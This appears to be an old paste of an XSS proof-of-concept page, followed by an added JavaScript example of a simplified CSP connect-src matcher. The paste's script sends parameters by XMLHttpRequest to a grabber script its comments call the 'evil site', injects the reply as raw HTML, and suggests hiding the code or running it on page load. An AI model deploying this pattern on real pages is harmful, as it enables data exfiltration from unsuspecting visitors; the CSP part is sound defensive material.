js GET xhr sample

a guest, Aug 5th, 2012
blog$ cat xss.html
<!DOCTYPE html>
<html>
<head>
<script type="text/javascript">
function oneSecAttack() {
var xmlhttp;
var base = 'http://localhost/kuba/sample/REgrabber.php?'; // base url - url to evil site
var a = 'a=aa';        // parameters
var b ='&b=bb';        //   ...
var c ='&c=cc';        //     ...

if (window.XMLHttpRequest)   {// for IE7+/FF/Chrome
  xmlhttp=new XMLHttpRequest();
  }
else   {// for ie5/6
  xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
  }
xmlhttp.onreadystatechange=function() // run forest run
  {
  if (xmlhttp.readyState==4 && xmlhttp.status==200)
    {
    // the grabber's response is written into the page as raw HTML
    document.getElementById("myDiv").innerHTML=xmlhttp.responseText;
    }
  }

var url2 = base + a + b + c;
xmlhttp.open("GET",url2 ,true);
xmlhttp.send();
document.write(url2 + " - <br><br>this HTTP GET content goes to the evil site as parameters<br>");
document.write("it could be useful in future (lfi/rfi for example)<br>");
// fin
}
</script>
</head>
<body>

<h2>Try to hide me</h2>
<button type="button" onclick="oneSecAttack()">Hide now!</button>
<b><br><br><br>Here we are loading the request from onClick(). I think in a 'real-life'<br>
scenario, the attacker will hide the code and/or add it as an 'onLoad' or similar idea.</b>
<div id="myDiv"></div>

</body>
</html>
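Added example, not code from the paste: a simplified matcher for the CSP connect-src directive, the browser-side control that decides whether the XMLHttpRequest above may reach the grabber host at all. It implements only a subset of CSP source matching (assumption: no path, nonce, hash or redirect rules), and the victim page origin is a constructed value.

```javascript
// Simplified CSP connect-src evaluation (added example, not from the paste).
// Supported source expressions: 'self', 'none', '*', scheme-source ("https:")
// and host-source ("[scheme://][*.]host[:port|:*]"). Path matching, nonces,
// hashes and redirect handling from the full CSP spec are deliberately omitted.

function parseConnectSrc(policy) {
  // Split the policy into directives; connect-src falls back to default-src.
  const directives = policy.split(';').map(d => d.trim()).filter(Boolean)
    .map(d => d.split(/\s+/));
  const pick = name => directives.find(d => d[0].toLowerCase() === name);
  const dir = pick('connect-src') || pick('default-src');
  return dir ? dir.slice(1) : null; // null: policy does not restrict connections
}

function sourceMatches(expr, target, page) {
  const e = expr.toLowerCase();
  if (e === "'none'") return false;
  if (e === '*') return true;
  if (e === "'self'") return target.origin === page.origin;
  if (/^[a-z][a-z0-9+.-]*:$/.test(e)) return target.protocol === e; // scheme-source
  const m = e.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/]+)(?::(\d+|\*))?$/);
  if (!m) return false;
  const [, scheme, wild, host, port] = m;
  // Without an explicit scheme the request must use the page's own scheme.
  if (scheme ? target.protocol !== scheme + ':' : target.protocol !== page.protocol) return false;
  const h = target.hostname;
  if (wild ? !h.endsWith('.' + host) : h !== host) return false; // "*.x" excludes "x"
  if (port === undefined) return target.port === '';            // default port only
  const tport = target.port || (target.protocol === 'https:' ? '443' : '80');
  return port === '*' || port === tport;
}

function connectAllowed(policy, pageUrl, requestUrl) {
  const sources = parseConnectSrc(policy);
  if (sources === null) return true;
  const page = new URL(pageUrl), target = new URL(requestUrl);
  return sources.some(s => sourceMatches(s, target, page));
}

// The grabber URL from the paste, requested from a constructed victim page.
const GRABBER = 'http://localhost/kuba/sample/REgrabber.php?a=aa&b=bb&c=cc';
const PAGE = 'http://victim.example/blog/'; // constructed origin of the vulnerable page
const STRICT = "default-src 'self'; connect-src 'self' https://api.victim.example";

console.log(connectAllowed(STRICT, PAGE, GRABBER));          // false: request blocked
console.log(connectAllowed('default-src *', PAGE, GRABBER)); // true: exfiltration allowed
```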